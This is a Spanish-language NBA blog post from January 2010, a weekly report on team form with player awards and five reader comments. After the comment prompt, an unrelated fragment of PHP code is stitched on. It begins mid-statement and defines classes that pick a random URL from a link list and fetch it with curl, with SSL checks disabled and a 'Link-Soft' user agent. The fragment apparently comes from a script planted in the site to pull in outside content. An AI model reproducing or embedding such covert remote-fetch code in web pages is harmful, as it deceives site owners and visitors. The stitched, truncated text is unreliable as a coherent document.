Informe Semanal #10

04 de January de 2010 por TheDeerHunter

¿Porqué todos los jugones sonríen igual?

Los dos mejores equipos de la semana no son habituales por estos páramos.

Por un lado tenemos a los Bulls. Con Del Negro más fuera que dentro sus pupilos parecen haberse conjurado para salvarle. También ha ayudado la vuelta a las canchas de Tyrus Thomas. Vuelven a plaza de playoffs y lo que no te mata te hace más fuerte.

En el Oeste los Grizzlies están que lo rompen. La pareja interior Marc-Randolph se está destapando como una de las más potentes del campeonato y alrededor de ellos hay buenas dosis de talento. Todavía haría falta ajustar la defensa para poder aspirar seriamente a la postemporada pero ofensivamente da gusto verles.

Finalmente, a los Lakers se les estropeó la semana con la paliza que recibieron en Phoenix y la lesión pendiente de evaluar de Pau Gasol pero si todos sus rivales tropiezan ellos son más líderes que la semana pasada.

Ganarás el pan con el sudor de tu frente

No ha sido nada fácil ganar esta semana. Ni siquiera los equipos más en forma de la liga lo han logrado. Los Cavs tropezaron anoche en casa contra los Bobcats tras una buena racha de juego y resultados. También estábamos a punto de decir lo bien que se estaban poniendo los Spurs cuando anoche perdieron contra los Raptors. Los Suns dan una de cal ganando consecutivamente a Lakers y Celtics y una de arena perdiendo contra los Grizzlies. Los Magic también siguen irregulares.

En el Oeste los Blazers aguantan como jabatos en condiciones desfavorables. También Houston, con el affair McGrady de por medio. Los Thunder amenazan la posición de ambos, así como los Hornets llegando desde un poco más atrás. Los Clippers están al acecho ante la inminente incorporación de Blake Griffin.

En el Este Toronto y Charlotte son los más beneficiados de la mediocre tónica general, así como los Knicks que se meten en la lucha por playoffs. Los Sixers llevan un 50% de victorias en los últimos 10 partidos que les valdría la plaza de seguir así el resto de la temporada. De esos 10, con Iverson, han perdido únicamente 2.

Se dejaban llevar

Tras el palizón que se llevaron anoche, los Mavs se ponen a 5 victorias de los Lakers. Los Jazz no se pueden permitir muchas semanas más como esta si quieren aspirar a postemporada. El caso de los Nuggets es distinto, pues arrastran ilustres lesionados.  Los Kings han tenido verdadera mala suerte y los Warriors tampoco es que aspiren a mucho más que ganar algún partido vistoso a la semana.

Los Celtics también están sufriendo por motivos de salud, aunque mantienen el liderato del Este. Milwaukee, Indiana e incluso New Jersey malviven con sus balances negativos.

El carabasas club

Si de alguien no nos podíamos quejar era de Atlanta o de Miami pero esta semana les ha caído a ambos la del pulpo. Esperemos que sea algo pasajero. Poco bueno podemos decir de Pistons, Wizards o Wolves.

PREMIOS SEMANALES y MENSUALES:

MVP: Si evocamos la palabra MVP todos pensaremos en los clutch de Kobe Bryant. Hasta 3 ha conseguido en el último mes con su lesión de dedo. Es el MVP de diciembre, sin duda. Durante la última semana, sin embargo, el MVP es Kevin Durant, que ha metido a su equipo en playoffs anotando 35 puntos por partido con 7 rebotes.

El rookie: El premio al mes de diciembre se lo daremos a Tyreke Evans, con números de 22 puntos, 5 rebotes y 5 asistencias. Con él fuera de combate y Jennings un tanto apagado, el mejor rookie de la semana ha sido el israelí Omri Casspi. A mí me recuerda a una especie de mezcla entre Turkoglu y Stojakovic. Buenísimo jugador.

La sorpresa: La sorpresa positiva de la semana ha sido la reincorporación de Nate Robinson. No contábamos con ello. Hoy ha trascendido que se ha negado a ser traspasado a Memphis. No sabemos lo que podría haber aportado a ese equipo. También sorprende la respuesta de los jugadores de Chicago ante los fuertes rumores de destitución de Del Negro.

La decepción: Caso Arenas. No coment.

Comenta

5 comentarios a esta entrada

  1. Tobal dice:
    #1

    Los Kings se están desinflando poco a poco,a pesar de las buenas sensaciones que llevan esta campaña,mientras que los Knicks se meten en la lucha por los Playoffs,son un conjunto muy ofensivo y que pueden dar algún susto.

      Citar

  2. MagicJohnson32 dice:
    #2

    Arenas… ¿Se puede ser más tonto? Y digo tonto por no decir una burrada. Intuyo que los Wizards están rezando para que le caiga una sentencia y quitárselo de encima. Es su oportunidad de cambiar el rumbo, cosa que necesitan con urgencia. Se hablaba de la salida de Butler, aunque igual con esto se lo piensan.

    Y hay que decirlo: Zach Randolph All Star sí o sí.

      Citar

  3. MagicJohnson32 dice:
    #3

    Ah, y tremendísimo nivel de Durant. Un pero: las pérdidas de balón. Es intolerable que un tío que apenas da 3 asistencias, pierda el balón casi 4 veces. Tiene, con mucha diferencia, el peor ratio de asistencia / pérdidas de la liga. Pero lo dicho, su temporada es de escándalo.

      Citar

  4. sergio dice:
    #4

    Pero tambien las compensa con mejores porcentajes que otros muchos jugadores de perfil similar… no Magic?? Westbrook tiene casi las mismas perdidas y absobre menos el juego… (este Sergio si soy yo)

      Citar

  5. MagicJohnson32 dice:
    #5

    Depende de qué entiendas por “compensar”. Para mí ‘compensar’ sería que perdiese 4 balones pero lo compensara dando 10 asistencias. Si lo que me dices es que las pérdidas no quitan para que esté jugando a un nivel estratosférico, estamos de acuerdo. Y no sólo “compensa” con buenos porcentajes, es su juego en general, que está siendo una barbaridad. Y además mejorando en defensa.

    Y Westbrook… hombre, está en más de 7 asistencias de media, es normal que pierda balones. Además, ha mejorado mucho con respecto al arranque de temporada. Ahora pierde muchos menos y da más asistencias, sólo hace falta comparar sus números de noviembre con los de diciembre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>